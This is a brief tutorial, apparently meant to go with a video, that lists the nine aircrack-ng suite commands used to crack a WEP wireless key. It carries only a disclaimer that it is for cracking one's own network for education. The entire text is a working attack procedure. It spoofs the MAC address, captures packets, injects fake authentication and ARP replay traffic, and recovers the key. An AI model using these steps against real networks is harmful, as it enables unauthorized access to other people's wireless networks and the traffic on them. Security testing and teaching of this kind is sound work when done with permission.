This is a tutorial on how to crack your own WEP key. Used for educational purposes only
Please note: The eth1 is most of the steps is my wireless device, you must replace the eth1 with your own info - you will see how in the video.
1)airmon-ng stop eth1
2)ifconfig eth1 down
3)macchanger –mac 00:11:22:33:44:55 eth1
4)airmon-ng start eth1
5)airodump-ng eth1
6)airodump-ng -c (channel) -w (file name) –BSSID (BSSID) eth1
7)aireplay-ng -1 0 -a (BSSID) -h 00:11:22:33:44:55 eth1
8)aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 eth1
9)aircrack-ng -b (BSSID) (filename-01.cap)

